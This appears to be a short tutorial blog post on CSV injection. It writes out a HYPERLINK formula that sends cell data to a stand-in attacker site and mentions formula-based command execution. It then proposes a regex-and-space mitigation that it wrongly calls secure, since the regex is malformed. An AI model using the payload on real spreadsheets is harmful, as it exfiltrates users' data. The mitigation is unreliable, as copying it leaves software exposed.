Is that CSV secure? Defining CSV injection vulnerabilities

CSV injection example

We have a page that stores data on a table and exports it on a CSV file

We put some normal data and nothing happens

But what happens if we put a formula like =2+5 in a field?

On our table, nothing happens, but when we open the CSV file we get the result of the formula that we introduced. This can be very dangerous if someone introduce a more dangerous code like

  =HYPERLINK("http://dangerous.com?x="&A3&"[CR]

When the user open the file it shows a link with our malicious site

Also, we can execute commands on the target with this formula injection, in where we open the calc when someone opens the CSV file

It shows some warnings but the user trust in the source of the file and accept

And then the code execution

The effectiveness of this vulnerability is that the user trust on the source of the file without asking himself if is the normal behaviour when someone opens a CSV file and the program asks form permission

Solution

• First is user awareness, because Windows shows an alert when someone puts command execution code in the CSV file like we’ve seen

• Second, input validation, the most common characters to do this attack are:

A developer could make a validation like this regex

validation.js.

var regexp = new RegExp(/([=,-,+,@])/g);

And blocking this types of input, also, can put a space between the dangerous character like ' =' to mitigate this vulnerability

if(regexp.test(formData.sdata1)){
  formData.sdata1 = " "+formData.sdata1
}
if(regexp.test(formData.sdata2)){
  formData.sdata2 = " "+formData.sdata2
}

In this example we can see that the spreadsheet program doesn’t calculate the formula and our input is secure

The source code of the page for testing can be found here.